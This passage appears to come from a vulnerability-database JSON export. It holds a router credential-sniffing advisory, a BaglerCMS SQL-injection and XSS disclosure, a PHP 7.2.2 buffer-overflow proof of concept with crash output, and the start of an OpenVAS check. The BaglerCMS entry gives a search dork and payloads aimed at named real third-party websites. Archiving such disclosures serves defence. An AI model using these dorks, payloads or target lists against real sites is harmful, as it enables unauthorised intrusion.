cation/xml;q=3D0.=\r\n9\r\n 0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=3D0.8..Acc=\r\ne\r\n 0x0100: 7074 2d4c 616e 6775 6167 653a 2065 6e2d pt-Language:.en-\r\n 0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=3D0.5..Ac=\r\nc\r\n 0x0120: 6570 742d 456e 636f 6469 6e67 3a20 677a ept-Encoding:.gz\r\n 0x0130: 6970 2c20 6465 666c 6174 650d 0a43 6f6e ip,.deflate..Con\r\n 0x0140: 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al\r\n 0x0150: 6976 650d 0a52 6566 6572 6572 3a20 6874 ive..Referer:.ht\r\n 0x0160: 7470 3a2f 2f31 3932 2e31 3638 2e30 2e31 tp://192.168.0.1\r\n 0x0170: 2f77 6562 7374 6172 2e68 746d 6c0d 0a41 /webstar.html..A\r\n 0x0180: 7574 686f 7269 7a61 7469 6f6e 3a20 4261 uthorization:.Ba\r\n 0x0190: 7369 6320 4f6b 4d30 626d fa38 3443 a9c0 sic.aWFtYXBhc3N3\r\n 0x01a0: 1b4e 1134 640a 054b ZAo=3D=3D....\r\n \r\n- From 0x0180 offset to the end of the packet payload the attacker could ge=\r\nt the password=20\r\nencoded with Base64 and simply convert it to plain text:\r\n \r\n$ echo aWFtYXBhc3N3ZAo=3D=3D | base64 -d\r\niamapassword\r\n \r\n- ---\r\n1355011796\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n \r\niQIcBAEBAgAGBQJQxAalAAoJENeXyOFXJgeJY5cP/2/1n/KGlXcyGLPbbzOa2517\r\nEW4UXl4apvKWWOfRfem7+zA/Y4Epxw2l3153Dbp52u2FWPSHzzI3ETK3zY8EYGjL\r\nJkBixPSURV8wPwl33XlM/i0dYbtgVspYEgbtFF/ox1mHe4yPapageu3W0rQvf1fX\r\nIcmS7gS7os65ch9nLH5CpqJBcpxw+n131iI8g5yJ8rmGmkjre8cIwsvG4tNfyZGo\r\nX96pgTzjYnLQww1UoGSkhhKEAudCwb6gqsuGNSbal/Sg1KXj3vmqeZlxWrDEGcuV\r\nfbyGYrn5/+mlayzZLChPSoZrET6qKr78PEPGz5sp0d4mRVz6txr0tpnmmY7aIKL0\r\nHlwhlN6nCbzmuq1RrBL+1FHMAP0Xi7JN6WH5AuDW75r5QO8CyYxIm8TlqXMScJYH\r\nbhX2CmfqkYpKsx3bbxDlqn5cCLUUdEm7UM/TuLcvzzAiyamBQgsrNCI6TOXClFRB\r\nzf321LYlndkJuziYkjTjnJHtroaNh9I0jJMZhVFLJSTuAXmCp0OutPveWEvEX/h9\r\ns6/7Iyi952A3YkqCEsy4q8JUaoxGLMvXeUZM71zVvwEeF8M/2BPziU/JleHMdXWq\r\nX2XH8V94KuiILuFSeS+rtT5ILJDHyWL9uVc1wIWvl33jnhPqSCgPlWvwLuWHBf+G\r\nE7C4vqJfmBNShPTbtb67\r\n=3DEzto\r\n-----END PGP SIGNATURE-----\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19928"}, {"lastseen": "2017-12-31T23:07:13", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-05-09T00:00:00", "published": "2012-05-09T00:00:00", "id": "1337DAY-ID-18221", "href": "https://0day.today/exploit/description/18221", "type": "zdt", "title": "BaglerCMS - SQLi/XSS Vulnerability", "sourceData": " 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n 0 _ __ __ __ 1\r\n 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n 1 1\r\n 0 [x] Official Website: http://www.1337day.com 0\r\n 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n 0 0\r\n 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1\r\n 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1\r\n 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0\r\n 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n\r\n ==========================================================================\r\n <<<:>>> BaglerCMS- SQLi/XSS Vulnerability <<:>>>\r\n ==========================================================================\r\n\r\n - Discovered By:\r\n ||| TheCyberNuxbie - Independent Security Research |||\r\n <<< [email\u00a0protected] >>> x YM: nux_exploit\r\n [ www.linuxhacktivist.com ] $ CP: +62856-2538-963\r\n\r\n - Use it at your risk,,, :-)\r\n This was written for educational purpos,,,\r\n Author will be not responsible for any damage. //nuxbie\r\n \r\n - Google Dork:\r\n inurl:\"/baglercms.php?articleID=\"\r\n\r\n [xXx] SQL injection is a code injection technique that exploits a security\r\n vulnerability occurring in the database layer of an #application.\r\n The vulnerability is present when user input is either incorrectly\r\n filtered for string literal escape characters embedded in SQL #statements\r\n or user input is not strongly typed and thereby unexpectedly executed.\r\n\r\n - Affected items (SQLi):\r\n http://127.0.0.1/webapps/baglercms.php?articleID=[SQLi]\r\n\r\n - Sample WebApps Vuln (SQLi):\r\n http://stokkesport.no/baglercms.php?articleID=384' + [SQL Injection]\r\n http://hoc.no/hmr/baglercms.php?articleID=556' + [SQL Injection]\r\n http://rgp.no/baglercms.php?articleID=401' + [SQL Injection]\r\n http://4dagers.no/baglercms.php?articleID=502' + [SQL Injection]\r\n http://osebergskilag.com/baglercms.php?articleID=2437' + [SQL Injection]\r\n http://roserittet.no/baglercms.php?articleID=2451' + [SQL Injection]\r\n http://tck.no/baglercms.php?articleID=772' + [SQL Injection]\r\n http://velotelmallorca.no/baglercms.php?articleID=1143' + [SQL Injection]\r\n http://aa-as.no/baglercms.php?articleID=1014' + [SQL Injection]\r\n http://vestfoldlaserklinikk.no/baglercms.php?articleID=1127' + [SQL Injection]\r\n http://dokkarundt.no/baglercms.php?articleID=1134' + [SQL Injection]\r\n , And many More @ Google...!!!\r\n\r\n [xXx] Cross-site scripting (XSS) is a type of computer security vulnerability\r\n typically found in web applications which allow code #injection by malicious\r\n web users into the web pages viewed by other users.\r\n\r\n - Affected items (XSSed):\r\n http://127.0.0.1/webapps/baglercms.php?articleID=[XSS]\r\n\r\n - Sample WebApps Vuln (XSSed):\r\n http://stokkesport.no/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://hoc.no/hmr/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://rgp.no/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://4dagers.no/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://osebergskilag.com/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://roserittet.no/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://tck.no/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://velotelmallorca.no/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://aa-as.no/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://vestfoldlaserklinikk.no/baglercms.php?articleID=<script>alert(31337);</script>\r\n http://dokkarundt.no/baglercms.php?articleID=<script>alert(31337);</script>\r\n , And many More @ Google...!!!\r\n\r\n - Matur Suwun:\r\n Om n0n0x, Om g3mb3L_YCL, Om cr4wl3r, Om Seeker Unzero, Om Denc0plax, etc,,,\r\n\r\n -:>>> Special Thanks <<<:-\r\n ...:::' 1337day Inj3ct0r TEAM ':::...\r\n , And All Inj3ct0r Fans & All Hacktivist,,, :-)\r\n\r\n -=[ Inj3ct0r TEAM | Inj3ct0r 31337 Member ]=-\r\n Boss r0073r, Sid3^effects, r4dc0re, CroSs, SeeMe, Indoushka, KnocKout,\r\n ZoRLu, anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, NuxbieCyber\r\n #############################################################################\r\n - Me @ Solo Raya, 09 May 2012 @ 06:44 AM.\r\n [ Inj3ct0r | PacketStromSecurity | Devilzc0de | Exploit-ID | ID-BackTrack ]\r\n #############################################################################\r\n\r\n\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18221"}], "exploitdb": [{"lastseen": "2018-06-06T12:20:24", "bulletinFamily": "exploit", "description": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow. CVE-2018-7584. Dos exploit for PHP platform", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "EDB-ID:44846", "href": "https://www.exploit-db.com/exploits/44846/", "type": "exploitdb", "title": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n\r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n\r\n\t\t\tif (tmp_line[tmp_line_len - 1] == '\\n') {\r\n\t\t\t\t--tmp_line_len;\r\n\t\t\t\tif (tmp_line[tmp_line_len - 1] == '\\r') {\r\n\t\t\t\t\t--tmp_line_len;\r\n\t\t\t\t}\r\n}\r\n\r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\r\n\r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n\r\n\r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n\r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n\r\nExpected result:\r\n----------------\r\nNO CRASH\r\n\r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44846/"}], "packetstorm": [{"lastseen": "2018-06-07T02:15:45", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "PACKETSTORM:148068", "href": "https://packetstormsecurity.com/files/148068/PHP-7.22-php_stream_url_wrap_http_ex-Buffer-Overflow.html", "title": "PHP 7.22 php_stream_url_wrap_http_ex Buffer Overflow", "type": "packetstorm", "sourceData": "`Description: \n------------ \nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at: \n \nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n \nif (tmp_line[tmp_line_len - 1] == '\\n') { \n--tmp_line_len; \nif (tmp_line[tmp_line_len - 1] == '\\r') { \n--tmp_line_len; \n} \n} \n \nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed. \n \n$ bin/php --version \nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS ) \nCopyright (c) 1997-2018 The PHP Group \nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies \n \n \nTest script: \n--------------- \n$ xxd -g 1 poc \n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100.. \n \n$ nc -vvlp 8080 < poc \nListening on [0.0.0.0] (family 0, port 8080) \nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083) \nGET / HTTP/1.0 \nHost: localhost:8080 \nConnection: close \n \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n \nExpected result: \n---------------- \nNO CRASH \n \nActual result: \n-------------- \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n================================================================= \n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac \nREAD of size 1 at 0xbfc038ef thread T0 \n#0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n#1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979 \n#2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027 \n#3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550 \n#4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224 \n#5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573 \n#6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731 \n#7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760 \n#8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082 \n#9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123 \n#10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134 \n#11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042 \n#12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404 \n#13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) \n#14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0) \nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack: \nThis frame has 13 object(s): \n[32, 36) 'transport_string' \n[96, 100) 'errstr' \n[160, 164) 'http_header_line_length' \n[224, 232) 'timeout' \n[288, 296) 'req_buf' \n[352, 360) 'tmpstr' \n[416, 432) 'ssl_proxy_peer_name' \n[480, 496) 'http_header' \n[544, 576) 'buf' \n[608, 736) 'tmp_line' \n[768, 1792) 'location' \n[1824, 2848) 'new_path' \n[2880, 3904) 'loc_path' \nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext \n(longjmp and C++ exceptions *are* supported) \nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex \nShadow bytes around the buggy address: \n0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 \n0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00 \n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00 \n0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 \n0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nHeap righ redzone: fb \nFreed Heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack partial redzone: f4 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nASan internal: fe \n==26249== ABORTING \nAborted \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148068/php722-overflow.txt"}, {"lastseen": "2016-11-03T10:27:28", "bulletinFamily": "exploit", "description": "", "modified": "2012-05-08T00:00:00", "published": "2012-05-08T00:00:00", "id": "PACKETSTORM:112542", "href": "https://packetstormsecurity.com/files/112542/Bagler-CMS-Cross-Site-Scripting-SQL-Injection.html", "title": "Bagler CMS Cross Site Scripting / SQL Injection", "type": "packetstorm", "sourceData": "` 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [x] Official Website: http://www.1337day.com 0 \n1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 \n0 0 \n1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 \n0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 \n1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 \n \n========================================================================== \n<<<:>>> BaglerCMS- SQLi/XSS Vulnerability <<:>>> \n========================================================================== \n \n- Discovered By: \n||| TheCyberNuxbie - Independent Security Research ||| \n<<< nuxbie@linuxhacktivist.com >>> x YM: nux_exploit \n[ www.linuxhacktivist.com ] $ CP: +62856-2538-963 \n \n- Use it at your risk,,, :-) \nThis was written for educational purpos,,, \nAuthor will be not responsible for any damage. //nuxbie \n \n- Google Dork: \ninurl:\"/baglercms.php?articleID=\" \n \n[xXx] SQL injection is a code injection technique that exploits a security \nvulnerability occurring in the database layer of an #application. \nThe vulnerability is present when user input is either incorrectly \nfiltered for string literal escape characters embedded in SQL #statements \nor user input is not strongly typed and thereby unexpectedly executed. \n \n- Affected items (SQLi): \nhttp://127.0.0.1/webapps/baglercms.php?articleID=[SQLi] \n \n- Sample WebApps Vuln (SQLi): \nhttp://stokkesport.no/baglercms.php?articleID=384' + [SQL Injection] \nhttp://hoc.no/hmr/baglercms.php?articleID=556' + [SQL Injection] \nhttp://rgp.no/baglercms.php?articleID=401' + [SQL Injection] \nhttp://4dagers.no/baglercms.php?articleID=502' + [SQL Injection] \nhttp://osebergskilag.com/baglercms.php?articleID=2437' + [SQL Injection] \nhttp://roserittet.no/baglercms.php?articleID=2451' + [SQL Injection] \nhttp://tck.no/baglercms.php?articleID=772' + [SQL Injection] \nhttp://velotelmallorca.no/baglercms.php?articleID=1143' + [SQL Injection] \nhttp://aa-as.no/baglercms.php?articleID=1014' + [SQL Injection] \nhttp://vestfoldlaserklinikk.no/baglercms.php?articleID=1127' + [SQL Injection] \nhttp://dokkarundt.no/baglercms.php?articleID=1134' + [SQL Injection] \n, And many More @ Google...!!! \n \n[xXx] Cross-site scripting (XSS) is a type of computer security vulnerability \ntypically found in web applications which allow code #injection by malicious \nweb users into the web pages viewed by other users. \n \n- Affected items (XSSed): \nhttp://127.0.0.1/webapps/baglercms.php?articleID=[XSS] \n \n- Sample WebApps Vuln (XSSed): \nhttp://stokkesport.no/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://hoc.no/hmr/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://rgp.no/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://4dagers.no/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://osebergskilag.com/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://roserittet.no/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://tck.no/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://velotelmallorca.no/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://aa-as.no/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://vestfoldlaserklinikk.no/baglercms.php?articleID=<script>alert(31337);</script> \nhttp://dokkarundt.no/baglercms.php?articleID=<script>alert(31337);</script> \n, And many More @ Google...!!! \n \n- Matur Suwun: \nOm n0n0x, Om g3mb3L_YCL, Om cr4wl3r, Om Seeker Unzero, Om Denc0plax, etc,,, \n \n-:>>> Special Thanks <<<:- \n...:::' 1337day Inj3ct0r TEAM ':::... \n, And All Inj3ct0r Fans & All Hacktivist,,, :-) \n \n-=[ Inj3ct0r TEAM | Inj3ct0r 31337 Member ]=- \nBoss r0073r, Sid3^effects, r4dc0re, CroSs, SeeMe, Indoushka, KnocKout, \nZoRLu, anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, NuxbieCyber \n############################################################################# \n- Me @ Solo Raya, 09 May 2012 @ 06:44 AM. \n[ Inj3ct0r | PacketStromSecurity | Devilzc0de | Exploit-ID | ID-BackTrack ] \n############################################################################# \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/112542/baglercms-sqlxss.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-10-29T12:32:24", "bulletinFamily": "scanner", "description": "Moodle CMS is prone to multiple vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2018-05-29T00:00:00", "id": "OPENVAS:1361412562310113201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113201", "title": "Moodle 3.x Multiple Vulnerabilities - May'18 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_mult_vuln_may18_04_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.x Multiple Vulnerabilities - May'18 (Windows)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113201\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-29 10:06:08 +0200 (Tue, 29 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n 